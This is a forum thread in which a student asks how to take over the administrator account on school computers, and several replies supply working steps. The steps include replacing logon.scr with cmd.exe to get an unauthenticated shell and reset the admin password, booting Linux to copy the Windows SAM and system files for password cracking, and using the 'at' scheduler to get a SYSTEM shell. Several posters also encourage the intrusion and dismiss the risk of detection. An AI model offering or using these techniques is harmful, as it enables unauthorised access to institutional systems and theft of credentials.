Need help with CMD school network hacking

Discussion in 'Ethical hacking' started by Denver Jackson, Sep 16, 2008.

1. Denver Jackson

Denver Jackson New Member

Hello,

I know how to get onto cmd at school and when i type in net user it comes with all the users (eg. Administrator) i then type in net user Administrator * and press enter.
    It comes up type new password i do that then confirm it.

Here is the problem it then says "System Error 5" "Access Denied "

Anyone with any help on how to get past this it will be appreciated.

2. cpulocksmith

cpulocksmith New Member

student
    hay kid i dont mean any disrespect but why do you wanna hack the school network? you want to get to the admin files i know that but why? what is on there that you want to get at? or do you just wanna do it for kicks? if so i really have no problem with it but it may not be worth the risk. if they do catch you screwing with the admin files you could get expelled. and as far as i know expelled == bad. and if you still wanna go through with this then why dont you start by finding out that error 5 is. that can be dont easily via google. i really dont mean any disrespect by this i just dont know what is up with kids wanting to hack the school computers.

3. XXxxImmortalxxXX

XXxxImmortalxxXX New Member

its because they are blocking your privalages in which u can only do so much i know some cools use deep freeze to stop ppl from doing such also a little hint the network admin at the board of ur schools keeps records of every account and what all they do so id watch out if i was u

4. SpOonWiZaRd

SpOonWiZaRd Know what you can do.

Network Engineer/Programmer
    have you tried to use net user Administrator [new pass] before?

5. XXxxImmortalxxXX

XXxxImmortalxxXX New Member

new pass will still deny it its basically the same command as net user blahh newpassword

6. germanboy104

germanboy104 New Member

Hey man, i gots da same problem at my school......
    but MS-DOS wont allow u to change the password purely because u dont have admin rights.
    y wouldnt u want the admin password anyway?! u could do so much more!

gettin the admin password is pretty easy......just download ubuntu ur someother linux based OS, then boot ur system off that.....along the process, the new system will give u the admin. password.

u can log on as an admin......but as far as accessing network drives, ur school's IT team may have assigned a password to them, so that u may not access them without yet another password......

7. SpOonWiZaRd

try safemode login, sometimes the Admin account has a password but the Administrator account doesn't, It worked a couple of times for me...

8. germanboy104

germanboy104 New Member

Re: Need help with CMD school network

im in school right now, and 2 b honest, whats the easiest system uve ever ed?
    if ur inclass and youre bored, why not spend some time tryin 2 figure out some and stuff?!
    furthermore, how would u get caught?! There are IP traces u can run to find who has messed with files, windows has utilitys to find this stuff 2. But really, with school IT programs, who there would really have the Know How to do that?! and even if they did, school computers get used by multiple students every day!! its almost impossible to track!! :crazy:

"the definition of IT in any school is merely counting on the students to lack the technical experience to do any damage to their equipment" :p

9. SpOonWiZaRd

Try this, might work, it worked for me a few times:

cd\
    cd\windows\system32
    mkdir temphack
    copy logon.scr temphack\logon.scr
    copy cmd.exe temphack\cmd.exe
    del logon.scr
    rename cmd.exe logon.scr
    exit

Now what you have just done is told the computer to backup the command program
    and the screen saver file, then edits the settings so when the machine boots the
    screen saver you will get an unprotected dos prompt with out logging into XP.

Then do this:

net user <admin account name here> password

and you have the admin password.

10. neo_vi

neo_vi Member

Software engineer
    Home Page:
    http://computertipaday.blogspot.com
    It never helped me. I tried it twice in my network. It returned some error.

11. SpOonWiZaRd

It just might work for him tough.

12. neo_vi

neo_vi Member

Software engineer
    Home Page:
    let's see.

13. SpOonWiZaRd

but remeber, that creates a cmd.exe in the temphack folder and also a logon.src in the temphack folder, he must run them and type the net user command in.

14. CarpeCaelum

CarpeCaelum New Member

Ha - whatever your reasons are, I always appreciate a good wrench in the system :)

This is my preferred method --> boot into an alternate OS (I'm a fan of Ubuntu 6.10) making sure graphics are compatible; run "sudo fdisk -l" to locate the main windows partition on the C; create a new directory wherever you want with "mkdir"; mount disk containing windows data into said directory with "mount /dev/[partition] /[preferred mount directory]; "gksudo nautilus" opens up a window with root privileges; navigate to the mounted drive; go into "c:\WINDOWS\system32\config"; copy "SAM" and "system" to a flash drive, accessed in 6.10 by mounting it in the same fashion as mounting the HDD.

Thereafter it's just a matter of crunching the data in those files; my favorite's SAMinside, a program run through windows that'll crack the passwords within ~30 min.

Naturally there are other ways to extract the SAM; this one's just appealing because of its relative ease of execution.

15. neo_vi

neo_vi Member

Software engineer
    Home Page:
    instead of using many commands to see the windows partition, u can easily do it with Distro's such as Puppy and DSL. Puppy is my favorite.

16. CarpeCaelum

CarpeCaelum New Member

...or you could do that ;)

17. shadowx360

shadowx360 New Member

Hm, lol, newbie hackers. typed this:

at 16:30 /interactive "cmd.exe"

Replace 16:30 with the hour (24 hour clock) and minutes. When the time comes, a cmd windows launches and wham, it is run under account "SYSTEM", which has even more powers then admin. Now you can use the cmd.exe to do whatever you want, including changing admin password. Also, since you are that far, why not get yourself a higher level shell? Type:

taskkill /f /im explorer.exe

If it doesn't work, then, you are using an old cmd, so type this instead:

tskill explorer

When the taskbar disappears, type:

start explore.exe

Wham! System shell and system cmd. You can't get any higher, SYSTEM has powers over all admins and users. Happy hacking. Oh, and btw, has anyone figured out how to more .job files between computers? I keep getting 0xc000013a error because I am copying it. My school disabled cmd altogether, and I can't use cmd to create a task, and I can't use schtasks because cmd.exe is disabled.

18. griff44444

griff44444 New Member

hahaha, I tried hacking my school system and it worked for the most part. I wasn't able to give myself admin rights or make a whole new admin name and work from there, but i was able to successfully send a message to every computer in the school :D
    I didn't know it was actually working when I did it, but when my two computer administrators came into my class 4 minutes before the bell saying someone was hacking the system, I came to find out it did actually work hahaha
    This is what you do to send a message to everyone if you want to konw:
    go to command prompt first and type this
    Net Send * "The Server is hacked!"
    or any message you want inside the quotes
    the star makes it so the message is sent through the whole network. Good luck with getting away with it though, It is traceable and i have no clue how to make you untraceable

19. wristbandsnow

wristbandsnow New Member

Hi Denver Jackson, Why are you hack you school network. Please give me any proper reason i give accurate solution for your problem. First of school have kids info and they have no other useful information Why? Thanks.

20. i think you are being a b word.